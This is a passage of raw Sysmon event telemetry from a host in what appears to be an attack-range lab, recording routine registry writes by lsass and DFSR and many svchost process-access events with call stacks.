12241200x800000000000000057350786Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:19:13.099{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 18141800x800000000000000057350785Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:13.099{8B6011A9-887D-6164-2F00-00000000F101}3036\lsassC:\Windows\system32\DFSRs.exe 13241300x800000000000000057350784Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:19:13.099{8B6011A9-887D-6164-2F00-00000000F101}3036C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\9752B235-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_9752B235-0000-0000-0000-100000000000.XML 12241200x800000000000000057350783Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:19:13.099{8B6011A9-887D-6164-2F00-00000000F101}3036C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\9752B235-0000-0000-0000-100000000000 11241100x800000000000000057350782Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.099{8B6011A9-887D-6164-2F00-00000000F101}3036C:\Windows\system32\DFSRs.exeC:\System Volume Information\DFSR\Config\Volume_9752B235-0000-0000-0000-100000000000.XML.TMP2021-11-12 12:19:13.099 10341000x800000000000000057350781Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.099{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350780Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.099{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350779Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.099{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350778Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.099{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350777Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.099{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350776Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.099{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350775Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.099{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350774Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.099{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350773Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.099{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350772Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.099{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350771Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.099{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350770Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.099{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350769Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.099{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350768Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.099{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350767Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.099{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2C-618D-C2DA-04000000F101}6044C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350766Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.099{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2C-618D-C2DA-04000000F101}6044C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350765Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.099{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2C-618D-C2DA-04000000F101}6044C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350764Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.099{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2C-618D-C2DA-04000000F101}6044C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350763Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.099{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2C-618D-C2DA-04000000F101}6044C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350762Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.099{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2C-618D-C2DA-04000000F101}6044C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350761Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.099{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2C-618D-C2DA-04000000F101}6044C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350760Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.099{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2C-618D-C2DA-04000000F101}6044C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350759Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.099{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2C-618D-C2DA-04000000F101}6044C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350758Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.099{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8898-6164-8200-00000000F101}4920C:\Windows\System32\sihost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350757Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.099{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8898-6164-8200-00000000F101}4920C:\Windows\System32\sihost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350756Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.099{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8898-6164-8200-00000000F101}4920C:\Windows\System32\sihost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350755Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.099{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8898-6164-8200-00000000F101}4920C:\Windows\System32\sihost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350754Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.099{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2D-618D-C4DA-04000000F101}8884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350753Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.099{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2D-618D-C4DA-04000000F101}8884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350752Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.099{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2D-618D-C4DA-04000000F101}8884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 12241200x800000000000000057350751Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:19:13.099{8B6011A9-887D-6164-2F00-00000000F101}3036C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Access Checks\Replication Groups\35EEEAF2-B901-4CD5-89B2-F32D96B40997 13241300x800000000000000057350750Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:19:13.099{8B6011A9-887D-6164-2F00-00000000F101}3036C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\35EEEAF2-B901-4CD5-89B2-F32D96B40997\Config SourceDWORD (0x00000001) 13241300x800000000000000057350749Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 